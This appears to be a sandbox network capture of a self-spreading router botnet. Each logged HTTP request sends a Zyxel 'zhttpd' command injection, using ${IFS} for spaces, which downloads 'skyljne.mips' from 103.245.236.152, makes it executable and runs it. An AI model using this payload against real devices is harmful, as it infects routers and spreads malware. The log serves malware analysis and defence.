                                            Jan 14, 2024 15:50:57.810969114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9318192.168.2.2353688169.153.205.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811017990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9319192.168.2.2352658101.25.33.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811074018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9320192.168.2.2337450113.135.87.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811090946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9321192.168.2.2357298197.60.77.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811136007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9322192.168.2.2342024209.209.159.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811173916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9323192.168.2.2343862193.147.25.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811233044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9324192.168.2.2345862125.215.149.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811263084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9325192.168.2.2353308121.120.58.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811320066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9326192.168.2.235401051.81.98.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811350107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9327192.168.2.2358614211.16.186.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811400890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9328192.168.2.2334140143.53.64.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811458111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9329192.168.2.2339136154.204.180.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811487913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9330192.168.2.2342940172.245.56.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811522007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9331192.168.2.233821043.16.55.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811599016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9332192.168.2.235801431.241.190.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811650038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9333192.168.2.233482883.98.247.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811676979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9334192.168.2.235926064.14.138.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811743021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9335192.168.2.2335112113.159.233.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811794043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9336192.168.2.233937886.214.16.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811805010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9337192.168.2.234640651.130.49.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811831951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9338192.168.2.2357342145.86.94.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811892986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9339192.168.2.2356134185.149.39.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811919928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9340192.168.2.2336618103.241.238.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.811964035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9341192.168.2.2355848114.128.48.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812021971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9342192.168.2.2338788157.115.65.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812041998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9343192.168.2.234824099.229.164.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812066078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9344192.168.2.2349824223.187.167.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812130928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9345192.168.2.2343174176.230.111.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812186956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9346192.168.2.2340350204.187.180.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812211037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9347192.168.2.235612259.39.41.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812247992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9348192.168.2.234718038.18.146.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812325954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9349192.168.2.23605901.32.246.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812355042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9350192.168.2.235264051.224.216.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812378883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9351192.168.2.2360718178.225.152.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812431097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9352192.168.2.2346124203.42.196.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812498093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9353192.168.2.234206658.48.31.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812545061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9354192.168.2.235480857.66.168.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812586069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9355192.168.2.2341956114.197.219.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812642097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9356192.168.2.234447042.114.63.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812683105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9357192.168.2.235107425.80.2.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812721014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9358192.168.2.234951479.196.75.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812766075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9359192.168.2.23452928.190.254.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812817097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9360192.168.2.2353220101.108.57.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812855959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9361192.168.2.2347548217.80.23.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812896013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9362192.168.2.233729050.211.195.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.812967062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9363192.168.2.2353276116.33.145.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813018084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9364192.168.2.2359198151.243.211.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813054085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9365192.168.2.233724892.146.227.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813076019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9366192.168.2.2338436183.187.216.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813167095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9367192.168.2.2335366174.42.97.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813210011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9368192.168.2.2347186163.139.166.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813216925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9369192.168.2.23482064.87.60.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813256979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9370192.168.2.2341050179.112.204.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813313007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9371192.168.2.235480617.246.73.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813330889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9372192.168.2.2355024146.130.10.126443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813435078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9373192.168.2.235179658.64.121.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813486099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9374192.168.2.235608280.18.4.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.813510895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9375192.168.2.2347522119.25.233.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818228960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9376192.168.2.235495866.42.84.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818257093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9377192.168.2.2352490152.157.96.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818267107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9378192.168.2.2357146206.156.99.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818311930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9379192.168.2.2332998126.242.22.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.818396091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9380192.168.2.2333436152.188.67.227443
                                            TimestampBytes transferredDirectionData
